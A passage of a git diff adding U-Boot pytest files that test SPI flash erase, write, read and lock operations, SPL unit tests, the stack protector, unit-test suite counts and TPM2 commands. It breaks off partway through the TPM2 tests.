spi_pre_commands(ubman, freq): + ''' Find out SPI family flash memory parameters ''' + bus, cs, mode, part_name, timeout = get_params_spi(ubman) + + output = ubman.run_command(f'sf probe {bus}:{cs} {freq} {mode}') + if not 'SF: Detected' in output: + pytest.fail('No SPI device available') + + if not part_name in output: + pytest.fail('Not recognized the SPI flash part name') + + m = re.search('page size (.+?) Bytes', output) + assert m + try: + page_size = int(m.group(1)) + except ValueError: + pytest.fail('Not recognized the SPI page size') + + m = re.search('erase size (.+?) KiB', output) + assert m + try: + erase_size = int(m.group(1)) + erase_size *= 1024 + except ValueError: + pytest.fail('Not recognized the SPI erase size') + + m = re.search('total (.+?) MiB', output) + assert m + try: + total_size = int(m.group(1)) + total_size *= 1024 * 1024 + except ValueError: + pytest.fail('Not recognized the SPI total size') + + m = re.search('Detected (.+?) 
with', output) + assert m + try: + flash_part = m.group(1) + assert flash_part == part_name + except ValueError: + pytest.fail('Not recognized the SPI flash part') + + global SPI_DATA + SPI_DATA = { + 'page_size': page_size, + 'erase_size': erase_size, + 'total_size': total_size, + 'flash_part': flash_part, + 'timeout': timeout, + } + +def get_page_size(): + ''' Get the SPI page size from spi data ''' + return SPI_DATA['page_size'] + +def get_erase_size(): + ''' Get the SPI erase size from spi data ''' + return SPI_DATA['erase_size'] + +def get_total_size(): + ''' Get the SPI total size from spi data ''' + return SPI_DATA['total_size'] + +def get_flash_part(): + ''' Get the SPI flash part name from spi data ''' + return SPI_DATA['flash_part'] + +def get_timeout(): + ''' Get the SPI timeout from spi data ''' + return SPI_DATA['timeout'] + +def spi_erase_block(ubman, erase_size, total_size): + ''' Erase SPI flash memory block wise ''' + for start in range(0, total_size, erase_size): + output = ubman.run_command(f'sf erase {hex(start)} {hex(erase_size)}') + assert EXPECTED_ERASE in output + +@pytest.mark.buildconfigspec('cmd_sf') +def test_spi_erase_block(ubman): + ''' Test case to check SPI erase functionality by erasing memory regions + block-wise ''' + + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_erase_block(ubman, get_erase_size(), get_total_size()) + i = i + 1 + +def spi_write_twice(ubman, page_size, erase_size, total_size, timeout): + ''' Random write till page size, random till size and full size ''' + addr = utils.find_ram_base(ubman) + + old_size = 0 + for size in ( + random.randint(4, page_size), + random.randint(page_size, total_size), + total_size, + ): + offset = random.randint(4, page_size) + offset = offset & ~3 + size = size & ~3 + size = size - old_size + output = ubman.run_command(f'crc32 {hex(addr + total_size)} {hex(size)}') + m = re.search('==> (.+?)$', output) + if not m: + pytest.fail('CRC32 failed') + + expected_crc32 = m.group(1) + if old_size % page_size: + old_size = int(old_size / page_size) + old_size *= page_size + + if size % erase_size: + erasesize = int(size / erase_size + 1) + erasesize *= erase_size + + eraseoffset = int(old_size / erase_size) + eraseoffset *= erase_size + + timeout = 100000000 + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf erase {hex(eraseoffset)} {hex(erasesize)}' + ) + assert EXPECTED_ERASE in output + + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf write {hex(addr + total_size)} {hex(old_size)} {hex(size)}' + ) + assert EXPECTED_WRITE in output + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + total_size + offset)} {hex(old_size)} {hex(size)}' + ) + assert EXPECTED_READ in output + output = ubman.run_command( + f'crc32 {hex(addr + total_size + offset)} {hex(size)}' + ) + assert expected_crc32 in output + old_size = size + +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_write_twice(ubman): + ''' Test to write data with random size twice for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_write_twice( + ubman, + get_page_size(), + get_erase_size(), + get_total_size(), + get_timeout() + ) + i = i + 1 + +def spi_write_continues(ubman, page_size, erase_size, 
total_size, timeout): + ''' Write with random size of data to continue SPI write case ''' + spi_erase_block(ubman, erase_size, total_size) + addr = utils.find_ram_base(ubman) + + output = ubman.run_command(f'crc32 {hex(addr + 0x10000)} {hex(total_size)}') + m = re.search('==> (.+?)$', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + old_size = 0 + for size in ( + random.randint(4, page_size), + random.randint(page_size, total_size), + total_size, + ): + size = size & ~3 + size = size - old_size + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf write {hex(addr + 0x10000 + old_size)} {hex(old_size)} {hex(size)}' + ) + assert EXPECTED_WRITE in output + old_size += size + + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + 0x10000 + total_size)} 0 {hex(total_size)}' + ) + assert EXPECTED_READ in output + + output = ubman.run_command( + f'crc32 {hex(addr + 0x10000 + total_size)} {hex(total_size)}' + ) + assert expected_crc32 in output + +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_write_continues(ubman): + ''' Test to write more random size data for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_write_twice( + ubman, + get_page_size(), + get_erase_size(), + get_total_size(), + get_timeout(), + ) + i = i + 1 + +def spi_read_twice(ubman, page_size, total_size, timeout): + ''' Read the whole SPI flash twice, random_size till full flash size, + random till page size ''' + for size in random.randint(4, page_size), random.randint(4, total_size), total_size: + addr = utils.find_ram_base(ubman) + size = size & ~3 + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + total_size)} 0 {hex(size)}' + ) + assert EXPECTED_READ in output + output = ubman.run_command(f'crc32 {hex(addr + total_size)} {hex(size)}') + m = re.search('==> (.+?)$', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf read {hex(addr + total_size + 10)} 0 {hex(size)}' + ) + assert EXPECTED_READ in output + output = ubman.run_command( + f'crc32 {hex(addr + total_size + 10)} {hex(size)}' + ) + assert expected_crc32 in output + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_read_twice(ubman): + ''' Test to read random data twice from SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_read_twice(ubman, get_page_size(), get_total_size(), get_timeout()) + i = i + 1 + +def spi_erase_all(ubman, total_size, timeout): + ''' Erase the full chip SPI ''' + start = 0 + with ubman.temporary_timeout(timeout): + output = ubman.run_command(f'sf erase {start} {hex(total_size)}') + assert EXPECTED_ERASE in output + +@pytest.mark.buildconfigspec('cmd_sf') +def test_spi_erase_all(ubman): + ''' Test to check full chip erase for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + spi_erase_all(ubman, get_total_size(), get_timeout()) + i = i + 1 + +def flash_ops( + ubman, ops, start, size, offset=0, exp_ret=0, exp_str='', not_exp_str='' +): + ''' Flash 
operations: erase, write and read ''' + + f = ubman.config.env.get('env__spi_device_test', None) + if not f: + timeout = 1000000 + + timeout = f.get('timeout', 1000000) + + if ops == 'erase': + with ubman.temporary_timeout(timeout): + output = ubman.run_command(f'sf erase {hex(start)} {hex(size)}') + else: + with ubman.temporary_timeout(timeout): + output = ubman.run_command( + f'sf {ops} {hex(offset)} {hex(start)} {hex(size)}' + ) + + if exp_str: + assert exp_str in output + if not_exp_str: + assert not_exp_str not in output + + ret_code = ubman.run_command('echo $?') + if exp_ret >= 0: + assert ret_code.endswith(str(exp_ret)) + + return output, ret_code + +def spi_unlock_exit(ubman, addr, size): + ''' Unlock the flash before making it fail ''' + ubman.run_command(f'sf protect unlock {hex(addr)} {hex(size)}') + assert False, 'FAIL: Flash lock is unable to protect the data!' + +def find_prot_region(lock_addr, lock_size): + ''' Get the protected and un-protected region of flash ''' + total_size = get_total_size() + erase_size = get_erase_size() + + if lock_addr < (total_size // 2): + sect_num = (lock_addr + lock_size) // erase_size + x = 1 + while x < sect_num: + x *= 2 + prot_start = 0 + prot_size = x * erase_size + unprot_start = prot_start + prot_size + unprot_size = total_size - unprot_start + else: + sect_num = (total_size - lock_addr) // erase_size + x = 1 + while x < sect_num: + x *= 2 + prot_start = total_size - (x * erase_size) + prot_size = total_size - prot_start + unprot_start = 0 + unprot_size = prot_start + + return prot_start, prot_size, unprot_start, unprot_size + +def protect_ops(ubman, lock_addr, lock_size, ops="unlock"): + ''' Run the command to lock or Unlock the flash ''' + ubman.run_command(f'sf protect {ops} {hex(lock_addr)} {hex(lock_size)}') + output = ubman.run_command('echo $?') + if ops == "lock" and not output.endswith('0'): + ubman.run_command(f'sf protect unlock {hex(lock_addr)} {hex(lock_size)}') + assert False, "sf protect lock command exits with non-zero return code" + assert output.endswith('0') + +def erase_write_ops(ubman, start, size): + ''' Basic erase and write operation for flash ''' + addr = utils.find_ram_base(ubman) + flash_ops(ubman, 'erase', start, size, 0, 0, EXPECTED_ERASE) + flash_ops(ubman, 'write', start, size, addr, 0, EXPECTED_WRITE) + +def spi_lock_unlock(ubman, lock_addr, lock_size): + ''' Lock unlock operations for SPI family flash ''' + addr = utils.find_ram_base(ubman) + erase_size = get_erase_size() + + # Find the protected/un-protected region + prot_start, prot_size, unprot_start, unprot_size = find_prot_region(lock_addr, lock_size) + + # Check erase/write operation before locking + erase_write_ops(ubman, prot_start, prot_size) + + # Locking the flash + protect_ops(ubman, lock_addr, lock_size, 'lock') + + # Check erase/write operation after locking + output, ret_code = flash_ops(ubman, 'erase', prot_start, prot_size, 0, -1) + if not any(error in output for error in EXPECTED_ERASE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + output, ret_code = flash_ops( + ubman, 'write', prot_start, prot_size, addr, -1 + ) + if not any(error in output for error in EXPECTED_WRITE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + # Check locked sectors + sect_lock_start = random.randrange(prot_start, (prot_start + prot_size), erase_size) + if prot_size > erase_size: + sect_lock_size = random.randrange( + erase_size, (prot_start + prot_size - sect_lock_start), 
erase_size + ) + else: + sect_lock_size = erase_size + sect_write_size = random.randint(1, sect_lock_size) + + output, ret_code = flash_ops( + ubman, 'erase', sect_lock_start, sect_lock_size, 0, -1 + ) + if not any(error in output for error in EXPECTED_ERASE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + output, ret_code = flash_ops( + ubman, 'write', sect_lock_start, sect_write_size, addr, -1 + ) + if not any(error in output for error in EXPECTED_WRITE_ERRORS) or ret_code.endswith( + '0' + ): + spi_unlock_exit(ubman, lock_addr, lock_size) + + # Check unlocked sectors + if unprot_size != 0: + sect_unlock_start = random.randrange( + unprot_start, (unprot_start + unprot_size), erase_size + ) + if unprot_size > erase_size: + sect_unlock_size = random.randrange( + erase_size, (unprot_start + unprot_size - sect_unlock_start), erase_size + ) + else: + sect_unlock_size = erase_size + sect_write_size = random.randint(1, sect_unlock_size) + + output, ret_code = flash_ops( + ubman, 'erase', sect_unlock_start, sect_unlock_size, 0, -1 + ) + if EXPECTED_ERASE not in output or ret_code.endswith('1'): + spi_unlock_exit(ubman, lock_addr, lock_size) + + output, ret_code = flash_ops( + ubman, 'write', sect_unlock_start, sect_write_size, addr, -1 + ) + if EXPECTED_WRITE not in output or ret_code.endswith('1'): + spi_unlock_exit(ubman, lock_addr, lock_size) + + # Unlocking the flash + protect_ops(ubman, lock_addr, lock_size, 'unlock') + + # Check erase/write operation after un-locking + erase_write_ops(ubman, prot_start, prot_size) + + # Check previous locked sectors + sect_lock_start = random.randrange(prot_start, (prot_start + prot_size), erase_size) + if prot_size > erase_size: + sect_lock_size = random.randrange( + erase_size, (prot_start + prot_size - sect_lock_start), erase_size + ) + else: + sect_lock_size = erase_size + sect_write_size = random.randint(1, sect_lock_size) + + flash_ops( + ubman, 'erase', sect_lock_start, sect_lock_size, 0, 0, EXPECTED_ERASE + ) + flash_ops( + ubman, + 'write', + sect_lock_start, + sect_write_size, + addr, + 0, + EXPECTED_WRITE, + ) + +@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_lock_unlock(ubman): + ''' Test to check the lock-unlock functionality for SPI family flash ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + flashes = ubman.config.env.get('env__spi_lock_unlock', False) + if not flashes: + pytest.skip('No SPI test device configured for lock/unlock') + + i = 0 + while i < loop: + spi_pre_commands(ubman, random.randint(min_f, max_f)) + total_size = get_total_size() + flash_part = get_flash_part() + + flashes_list = flashes.get('supported_flash', None).split(',') + flashes_list = [x.strip() for x in flashes_list] + if flash_part not in flashes_list: + pytest.skip('Detected flash does not support lock/unlock') + + # For lower half of memory + lock_addr = random.randint(0, (total_size // 2) - 1) + lock_size = random.randint(1, ((total_size // 2) - lock_addr)) + spi_lock_unlock(ubman, lock_addr, lock_size) + + # For upper half of memory + lock_addr = random.randint((total_size // 2), total_size - 1) + lock_size = random.randint(1, (total_size - lock_addr)) + spi_lock_unlock(ubman, lock_addr, lock_size) + + # For entire flash + lock_addr = random.randint(0, total_size - 1) + lock_size = random.randint(1, (total_size - lock_addr)) + spi_lock_unlock(ubman, lock_addr, lock_size) + + i = i + 1 + 
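+# A worked example of the sector rounding performed by find_prot_region(),
+# using hypothetical flash geometry (a 16 MiB part with 64 KiB erase sectors):
+# find_prot_region(0x0, 0x30000) spans three sectors, which is rounded up to
+# the next power of two (four sectors), so it returns prot_start=0x0,
+# prot_size=0x40000, unprot_start=0x40000 and unprot_size=0xfc0000. The
+# lock/unlock checks above pick their protected and unprotected test regions
+# from values derived in this way.
+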
+@pytest.mark.buildconfigspec('cmd_bdi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_memory') +def test_spi_negative(ubman): + ''' Negative tests for SPI ''' + min_f, max_f, loop = spi_find_freq_range(ubman) + spi_pre_commands(ubman, random.randint(min_f, max_f)) + total_size = get_total_size() + erase_size = get_erase_size() + page_size = get_page_size() + addr = utils.find_ram_base(ubman) + i = 0 + while i < loop: + # Erase negative test + start = random.randint(0, total_size) + esize = erase_size + + # If erasesize is not multiple of flash's erase size + while esize % erase_size == 0: + esize = random.randint(0, total_size - start) + + error_msg = 'Erased: ERROR' + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If eraseoffset exceeds beyond flash size + eoffset = random.randint(total_size, (total_size + int(0x1000000))) + error_msg = 'Offset exceeds device limit' + flash_ops( + ubman, 'erase', eoffset, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If erasesize exceeds beyond flash size + esize = random.randint((total_size - start), (total_size + int(0x1000000))) + error_msg = 'ERROR: attempting erase past flash size' + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If erase size is 0 + esize = 0 + error_msg = None + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # If erasesize is less than flash's page size + esize = random.randint(0, page_size) + start = random.randint(0, (total_size - page_size)) + error_msg = 'Erased: ERROR' + flash_ops( + ubman, 'erase', start, esize, 0, 1, error_msg, EXPECTED_ERASE + ) + + # Write/Read negative test + # if Write/Read size exceeds beyond flash size + offset = random.randint(0, total_size) + size = random.randint((total_size - offset), (total_size + int(0x1000000))) + error_msg = 'Size exceeds partition or device limit' + flash_ops( + ubman, 'write', offset, size, addr, 1, error_msg, EXPECTED_WRITE + ) + flash_ops( + ubman, 'read', offset, size, addr, 1, error_msg, EXPECTED_READ + ) + + # if Write/Read offset exceeds beyond flash size + offset = random.randint(total_size, (total_size + int(0x1000000))) + size = random.randint(0, total_size) + error_msg = 'Offset exceeds device limit' + flash_ops( + ubman, 'write', offset, size, addr, 1, error_msg, EXPECTED_WRITE + ) + flash_ops( + ubman, 'read', offset, size, addr, 1, error_msg, EXPECTED_READ + ) + + # if Write/Read size is 0 + offset = random.randint(0, 2) + size = 0 + error_msg = None + flash_ops( + ubman, 'write', offset, size, addr, 1, error_msg, EXPECTED_WRITE + ) + flash_ops( + ubman, 'read', offset, size, addr, 1, error_msg, EXPECTED_READ + ) + + # Read to relocation address + output = ubman.run_command('bdinfo') + m = re.search(r'relocaddr\s*= (.+)', output) + res_area = int(m.group(1), 16) + + start = 0 + size = 0x2000 + error_msg = 'ERROR: trying to overwrite reserved memory' + flash_ops( + ubman, 'read', start, size, res_area, 1, error_msg, EXPECTED_READ + ) + + i = i + 1 diff --git a/test/py/tests/test_spl.py b/test/py/tests/test_spl.py new file mode 100644 index 00000000000..48407399039 --- /dev/null +++ b/test/py/tests/test_spl.py @@ -0,0 +1,43 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2020 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +@pytest.mark.buildconfigspec('spl_unit_test') +def test_ut_spl_init(ubman): + """Initialize data for ut spl tests.""" + + fn = ubman.config.source_dir + 
'/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + +def test_spl(ubman, ut_spl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + spl/u-boot-spl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + ubman (ConsoleBase): U-Boot console + ut_subtest (str): SPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + ubman.restart_uboot_with_flags(['-u', '-k', ut_spl_subtest.split()[1]]) + output = ubman.get_spawn_output().replace('\r', '') + assert 'failures: 0' in output + finally: + # Restart afterward in case a non-SPL test is run next. This should not + # happen since SPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. + ubman.restart_uboot() diff --git a/test/py/tests/test_stackprotector.py b/test/py/tests/test_stackprotector.py new file mode 100644 index 00000000000..a7e20d6307c --- /dev/null +++ b/test/py/tests/test_stackprotector.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2021 Broadcom + +import pytest +import signal + +@pytest.mark.buildconfigspec('cmd_stackprotector_test') +@pytest.mark.notbuildconfigspec('asan') +def test_stackprotector(ubman): + """Test that the stackprotector function works.""" + + ubman.run_command('stackprot_test',wait_for_prompt=False) + expected_response = 'Stack smashing detected' + ubman.wait_for(expected_response) + ubman.restart_uboot() diff --git a/test/py/tests/test_suite.py b/test/py/tests/test_suite.py new file mode 100644 index 00000000000..7fe9a90dfd3 --- /dev/null +++ b/test/py/tests/test_suite.py @@ -0,0 +1,207 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2024 Google LLC + +import pytest +import re + +# List of test suites we expect to find with 'ut info' and 'ut all' +EXPECTED_SUITES = [ + 'addrmap', 'bdinfo', 'bloblist', 'bootm', 'bootstd', + 'cmd', 'common', 'dm', 'env', 'exit', 'fdt_overlay', + 'fdt', 'font', 'hush', 'lib', + 'loadm', 'log', 'mbr', 'measurement', 'mem', + 'pci_mps', 'setexpr', 'upl', + ] + + +# Set this to True to aid debugging of tests +DEBUG_ME = False + + +def collect_info(ubman, output): + """Process the output from 'ut all' + + Args: + ubman: U-Boot console object + output: Output from running 'ut all' + + Returns: + tuple: + set: suite names that were found in output + set: test names that were found in output + dict: test count for each suite: + key: suite name + value: number of tests for the suite found in output + set: missing suites (compared to EXPECTED_SUITES) + set: extra suites (compared to EXPECTED_SUITES) + """ + suites = set() + tests = set() + cur_suite = None + test_count = None + exp_test_count = {} + + # Collect suites{} + for line in output.splitlines(): + line = line.rstrip() + if DEBUG_ME: + ubman.log.info(f'line: {line}') + m = re.search('----Running ([^ ]*) tests----', line) + if m: + if DEBUG_ME and cur_suite and cur_suite != 'info': + ubman.log.info(f'suite: {cur_suite} expected {exp_test_count[cur_suite]} found {test_count}') + + cur_suite = m.group(1) + if DEBUG_ME: + ubman.log.info(f'cur_suite: 
{cur_suite}') + suites.add(cur_suite) + + test_count = 0 + m = re.match(rf'Running (\d+) {cur_suite} tests', line) + if m: + exp_test_count[cur_suite] = int(m.group(1)) + m = re.search(r'Test: (\w*): ([-a-z0-9_]*\.c)?( .*)?', line) + if m: + test_name = m.group(1) + msg = m.group(3) + if DEBUG_ME: + ubman.log.info(f"test_name {test_name} msg '{msg}'") + full_name = f'{cur_suite}.{test_name}' + if msg == ' (flat tree)' and full_name not in tests: + tests.add(full_name) + test_count += 1 + if not msg or 'skipped as it is manual' in msg: + tests.add(full_name) + test_count += 1 + if DEBUG_ME: + ubman.log.info(f'test_count {test_count}') + if DEBUG_ME: + ubman.log.info(f'suite: {cur_suite} expected {exp_test_count[cur_suite]} found {test_count}') + ubman.log.info(f"Tests: {' '.join(sorted(list(tests)))}") + + # Figure out what is missing, or extra + missing = set() + extra = set(suites) + for suite in EXPECTED_SUITES: + if suite in extra: + extra.remove(suite) + else: + missing.add(suite) + + return suites, tests, exp_test_count, missing, extra + + +def process_ut_info(ubman, output): + """Process the output of the 'ut info' command + + Args: + ubman: U-Boot console object + output: Output from running 'ut all' + + Returns: + tuple: + int: Number of suites reported + int: Number of tests reported + dict: test count for each suite: + key: suite name + value: number of tests reported for the suite + + """ + suite_count = None + total_test_count = None + test_count = {} + for line in output.splitlines(): + line = line.rstrip() + if DEBUG_ME: + ubman.log.info(f'line: {line}') + m = re.match(r'Test suites: (.*)', line) + if m: + suite_count = int(m.group(1)) + m = re.match(r'Total tests: (.*)', line) + if m: + total_test_count = int(m.group(1)) + m = re.match(r' *([0-9?]*) (\w*)', line) + if m: + test_count[m.group(2)] = m.group(1) + return suite_count, total_test_count, test_count + + +@pytest.mark.buildconfigspec('sandbox') +@pytest.mark.notbuildconfigspec('sandbox_spl') +@pytest.mark.notbuildconfigspec('sandbox64') +# This test is disabled since it fails; remove the leading 'x' to try it +def xtest_suite(ubman, u_boot_config): + """Perform various checks on the unit tests, including: + + - The number of suites matches that reported by the 'ut info' + - Where available, the number of tests is each suite matches that + reported by 'ut -s info' + - The total number of tests adds up to the total that are actually run + with 'ut all' + - All suites are run with 'ut all' + - The expected set of suites is run (the list is hard-coded in this test) + + """ + buildconfig = u_boot_config.buildconfig + with ubman.log.section('Run all unit tests'): + # ut hush hush_test_simple_dollar prints "Unknown command" on purpose. 
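+        # That output is expected, so the 'unknown_command' console check is
+        # disabled around the 'ut all' run below; without this the console
+        # scan would flag the expected message as an error.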
+ with ubman.disable_check('unknown_command'): + output = ubman.run_command('ut all') + + # Process the output from the run + with ubman.log.section('Check output'): + suites, all_tests, exp_test_count, missing, extra = collect_info(ubman, + output) + ubman.log.info(f'missing {missing}') + ubman.log.info(f'extra {extra}') + + # Make sure we got a test count for each suite + assert not (suites - exp_test_count.keys()) + + # Deal with missing suites + with ubman.log.section('Check missing suites'): + if 'config_cmd_seama' not in buildconfig: + ubman.log.info("CMD_SEAMA not enabled: Ignoring suite 'seama'") + missing.discard('seama') + + # Run 'ut info' and compare with the log results + with ubman.log.section('Check suite test-counts'): + output = ubman.run_command('ut -s info') + + suite_count, total_test_count, test_count = process_ut_info(ubman, + output) + + if missing or extra: + ubman.log.info(f"suites: {' '.join(sorted(list(suites)))}") + ubman.log.error(f'missing: {sorted(list(missing))}') + ubman.log.error(f'extra: {sorted(list(extra))}') + + assert not missing, f'Missing suites {missing}' + assert not extra, f'Extra suites {extra}' + + ubman.log.info(str(exp_test_count)) + for suite in EXPECTED_SUITES: + assert test_count[suite] in ['?', str(exp_test_count[suite])], \ + f'suite {suite} expected {exp_test_count[suite]}' + + assert suite_count == len(EXPECTED_SUITES) + assert total_test_count == len(all_tests) + + # Run three suites + with ubman.log.section('Check multiple suites'): + output = ubman.run_command('ut bloblist,setexpr,mem') + assert 'Suites run: 3' in output + + # Run a particular test + with ubman.log.section('Check single test'): + output = ubman.run_command('ut bloblist reloc') + assert 'Test: reloc: bloblist.c' in output + + # Run tests multiple times + with ubman.log.section('Check multiple runs'): + output = ubman.run_command('ut -r2 bloblist') + lines = output.splitlines() + run = len([line for line in lines if 'Test:' in line]) + count = re.search(r'Tests run: (\d*)', lines[-1]).group(1) + + assert run == 2 * int(count) diff --git a/test/py/tests/test_tpm2.py b/test/py/tests/test_tpm2.py new file mode 100644 index 00000000000..064651c3e23 --- /dev/null +++ b/test/py/tests/test_tpm2.py @@ -0,0 +1,318 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Bootlin +# Author: Miquel Raynal <miquel.raynal@bootlin.com> + +import os.path +import pytest +import utils +import re +import time + +""" +Test the TPMv2.x related commands. You must have a working hardware setup in +order to do these tests. + +Notes: +* These tests will prove the password mechanism. The TPM chip must be cleared of +any password. +* Commands like pcr_setauthpolicy and pcr_resetauthpolicy are not implemented +here because they would fail the tests in most cases (TPMs do not implement them +and return an error). + + +Note: +This test doesn't rely on boardenv_* configuration value but can change test +behavior. + +* Setup env__tpm_device_test_skip to True if tests with TPM devices should be +skipped. + +""" + +updates = 0 + +def force_init(ubman, force=False): + """When a test fails, U-Boot is reset. Because TPM stack must be initialized + after each reboot, we must ensure these lines are always executed before + trying any command or they will fail with no reason. Executing 'tpm init' + twice will spawn an error used to detect that the TPM was not reset and no + initialization code should be run. 
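+
+    As a rough outline (mirroring the body of this helper), the recovery
+    sequence issued on the U-Boot console is:
+
+        tpm2 autostart
+        tpm2 clear TPM2_RH_LOCKOUT
+        tpm2 clear TPM2_RH_PLATFORM   (only if the LOCKOUT clear failed)
+
+    with the 'clear' commands skipped entirely when 'tpm2 autostart' reports
+    an error and force is not set.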
+ """ + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + output = ubman.run_command('tpm2 autostart') + if force or not 'Error' in output: + ubman.run_command('echo --- start of init ---') + ubman.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = ubman.run_command('echo $?') + if not output.endswith('0'): + ubman.run_command('tpm2 clear TPM2_RH_PLATFORM') + ubman.run_command('echo --- end of init ---') + +def is_sandbox(ubman): + # Array slice removes leading/trailing quotes. + sys_arch = ubman.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + return sys_arch == 'sandbox' + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_init(ubman): + """Init the software stack to use TPMv2 commands.""" + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 autostart') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_startup(ubman): + """Execute a TPM2_Startup command. + + Initiate the TPM internal state machine. + """ + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 startup TPM2_SU_CLEAR') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +def tpm2_sandbox_init(ubman): + """Put sandbox back into a known state so we can run a test + + This allows all tests to run in parallel, since no test depends on another. + """ + ubman.restart_uboot() + ubman.run_command('tpm2 autostart') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_sandbox_self_test_full(ubman): + """Execute a TPM2_SelfTest (full) command. + + Ask the TPM to perform all self tests to also enable full capabilities. + """ + if is_sandbox(ubman): + ubman.restart_uboot() + ubman.run_command('tpm2 autostart') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + ubman.run_command('tpm2 startup TPM2_SU_CLEAR') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 self_test full') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_continue_self_test(ubman): + """Execute a TPM2_SelfTest (continued) command. + + Ask the TPM to finish its self tests (alternative to the full test) in order + to enter a fully operational state. + """ + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + ubman.run_command('tpm2 self_test continue') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_clear(ubman): + """Execute a TPM2_Clear command. + + Ask the TPM to reset entirely its internal state (including internal + configuration, passwords, counters and DAM parameters). This is half of the + TAKE_OWNERSHIP command from TPMv1. + + Use the LOCKOUT hierarchy for this. 
